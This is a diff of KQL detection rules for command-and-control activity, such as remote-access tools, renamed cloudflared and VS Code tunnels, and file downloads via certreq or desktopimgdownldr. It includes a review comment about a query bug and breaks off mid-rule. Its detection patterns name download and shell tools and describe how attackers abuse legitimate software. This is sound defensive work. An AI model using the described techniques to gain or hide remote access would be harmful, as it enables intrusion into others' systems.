-// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
-// Historical data shows that threat actors rename MeshAgent binary to evade detection.
-// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Environments that legitimately use MeshAgent
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Potential MeshAgent Execution - Windows
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: medium
+// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
+// Historical data shows that threat actors rename MeshAgent binary to evade detection.
+// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Environments that legitimately use MeshAgent
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "--meshServiceName"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
index b2a13fc3..fcbfb0f9 100644
--- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
@@ -1,12 +1,12 @@ -// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS -// Author: Norbert Jaśniewicz (AlphaSOC) -// Date: 2025-05-19 -// Level: high -// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. -// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. -// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 - -DeviceProcessEvents +// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: high +// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. +// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not((FolderPath endswith "/meshagent" or FolderPath endswith "/meshagent_osx64"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql index 0adbbe6e..390b946e 100644 
--- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql +++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows -// Author: Norbert Jaśniewicz (AlphaSOC) -// Date: 2025-05-19 -// Level: high -// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. -// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. -// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 - -DeviceProcessEvents +// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: high +// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. +// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not(FolderPath endswith "\\meshagent.exe")) \ No newline at end of file 
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql index 4b65c2ec..c61219c6 100644 --- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql 
@@ -1,14 +1,14 @@ -// Title: Remote Access Tool - ScreenConnect Execution -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate usage of the tool - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Execution +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate usage of the tool + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "ScreenConnect Service" or ProcessVersionInfoProductName =~ "ScreenConnect" or ProcessVersionInfoCompanyName =~ "ScreenConnect Software" \ No newline at end of file 
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql index 78ef6bc3..8ba05d1c 100644 --- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql 
@@ -1,12 +1,12 @@ -// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale -// Date: 2022-02-25 -// Level: medium -// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed. - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale +// Date: 2022-02-25 +// Level: medium +// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed. + +DeviceProcessEvents | where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wevtutil.exe") and (InitiatingProcessCommandLine contains ":\\Windows\\TEMP\\ScreenConnect\\" and InitiatingProcessCommandLine contains "run.cmd") \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql index 27d66443..296cee81 100644 
--- a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql 
@@ -1,14 +1,14 @@ -// Title: Remote Access Tool - Simple Help Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-23 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate usage of the tool - -DeviceProcessEvents +// Title: Remote Access Tool - Simple Help Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate usage of the tool + +DeviceProcessEvents | where (FolderPath contains "\\JWrapper-Remote Access\\" or FolderPath contains "\\JWrapper-Remote Support\\") and FolderPath endswith "\\SimpleService.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql index 27505599..06bc159c 100644 --- a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql +++ b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql 
@@ -1,14 +1,14 @@ -// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server -// Author: Ahmed Nosir (@egycondor) -// Date: 2025-05-29 -// Level: medium -// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. -// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. -// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219, attack.t1105 -// False Positives: -// - Legitimate system administrator deploying TacticalRMM - -DeviceProcessEvents +// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server +// Author: Ahmed Nosir (@egycondor) +// Date: 2025-05-29 +// Level: medium +// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. +// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. +// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219, attack.t1105 +// False Positives: +// - Legitimate system administrator deploying TacticalRMM + +DeviceProcessEvents | where (ProcessCommandLine contains "--api" and ProcessCommandLine contains "--auth" and ProcessCommandLine contains "--client-id" and ProcessCommandLine contains "--site-id" and ProcessCommandLine contains "--agent-type") and FolderPath contains "\\TacticalAgent\\tacticalrmm.exe" \ No newline at end of file 
diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql index bf284ccc..cc5c040e 100644 --- a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql 
@@ -1,14 +1,14 @@ -// Title: Remote Access Tool - UltraViewer Execution -// Author: frack113 -// Date: 2022-09-25 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Remote Access Tool - UltraViewer Execution +// Author: frack113 +// Date: 2022-09-25 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoProductName =~ "UltraViewer" or ProcessVersionInfoCompanyName =~ "DucFabulous Co,ltd" or ProcessVersionInfoOriginalFileName =~ "UltraViewer_Desktop.exe" \ No newline at end of file 
diff --git a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql index e0c3c2b3..3a5ebb05 100644 --- a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql +++ b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql @@ -1,10 +1,10 @@ -// Title: Remote File Download Via Desktopimgdownldr Utility -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-27 -// Level: medium -// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Remote File Download Via Desktopimgdownldr Utility +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where ProcessCommandLine contains "/lockscreenurl:http" and FolderPath endswith "\\desktopimgdownldr.exe" and InitiatingProcessFolderPath endswith "\\desktopimgdownldr.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql index a348e3fb..b5eaa2ca 100644 --- a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql +++ b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql 
@@ -1,10 +1,10 @@ -// Title: Renamed Cloudflared.EXE Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-12-20 -// Level: high -// Description: Detects the execution of a renamed "cloudflared" binary. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090.001 - -DeviceProcessEvents +// Title: Renamed Cloudflared.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-20 +// Level: high +// Description: Detects the execution of a renamed "cloudflared" binary. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")) or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or 
SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith 
"d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run "))) and (not((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql index 7c2a00db..92202d6b 100644 --- a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql +++ b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql 
@@ -1,10 +1,10 @@ -// Title: Renamed Visual Studio Code Tunnel Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-28 -// Level: high -// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 - -DeviceProcessEvents +// Title: Renamed Visual Studio Code Tunnel Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-28 +// Level: high +// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 + +DeviceProcessEvents | where (((ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") or (ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log")) and (not((FolderPath endswith "\\code-tunnel.exe" or FolderPath endswith "\\code.exe")))) or (((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe")))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql index f1ca8a9d..1662a343 100644 
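Review bot: The first branch of the query on the new side, `ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)`, is unlikely ever to match: Kusto string columns do not carry null (a missing version-info value arrives as the empty string), so `isnull()` on `ProcessVersionInfoOriginalFileName` evaluates to false and the rule silently drops the case of a tunnel binary that has no version resource. Use `isempty(ProcessVersionInfoOriginalFileName)` there, which covers both the empty-string and the null case. If the converter emits `isnull()` for every Sigma field compared against null, the same dead branch probably appears in other generated rules, so the fix belongs in the converter's null handling rather than in this file alone.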
--- a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql +++ b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql @@ -1,10 +1,10 @@ -// Title: Renamed VsCode Code Tunnel Execution - File Indicator -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-25 -// Level: high -// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control - -DeviceFileEvents +// Title: Renamed VsCode Code Tunnel Execution - File Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: high +// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceFileEvents | where FolderPath endswith "\\code_tunnel.json" and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/replace_exe_usage.kql b/KQL/rules/Command and Control/replace_exe_usage.kql index 78089437..4a5b51be 100644 --- a/KQL/rules/Command and Control/replace_exe_usage.kql +++ b/KQL/rules/Command and Control/replace_exe_usage.kql 
@@ -1,10 +1,10 @@ -// Title: Replace.exe Usage -// Author: frack113 -// Date: 2022-03-06 -// Level: medium -// Description: Detects the use of Replace.exe which can be used to replace file with another file -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Replace.exe Usage +// Author: frack113 +// Date: 2022-03-06 +// Level: medium +// Description: Detects the use of Replace.exe which can be used to replace file with another file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where FolderPath endswith "\\replace.exe" and (ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a") \ No newline at end of file diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql index 056b4f88..3510f5fa 100644 --- a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql +++ b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql 
@@ -1,14 +1,14 @@ -// Title: ScreenConnect Temporary Installation Artefact -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceFileEvents +// Title: ScreenConnect Temporary Installation Artefact +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents | where FolderPath contains "\\Bin\\ScreenConnect." \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql index 00da7605..a8b8ee3c 100644 
--- a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql +++ b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Binary Writes Via AnyDesk -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-28 -// Level: high -// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". -// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, -// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 - -DeviceFileEvents +// Title: Suspicious Binary Writes Via AnyDesk +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-28 +// Level: high +// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". +// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, +// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe") and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) and (not(FolderPath endswith "\\gcapi.dll")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql index 34ab42d8..28edfa39 100644 --- a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql 
+++ b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql @@ -1,14 +1,14 @@ -// Title: Suspicious CertReq Command to Download -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-11-24 -// Level: high -// Description: Detects a suspicious CertReq execution downloading a file. -// This behavior is often used by attackers to download additional payloads or configuration files. -// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious CertReq Command to Download +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-11-24 +// Level: high +// Description: Detects a suspicious CertReq execution downloading a file. +// This behavior is often used by attackers to download additional payloads or configuration files. +// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "-config" or ProcessCommandLine contains "/config" or ProcessCommandLine contains "–config" or ProcessCommandLine 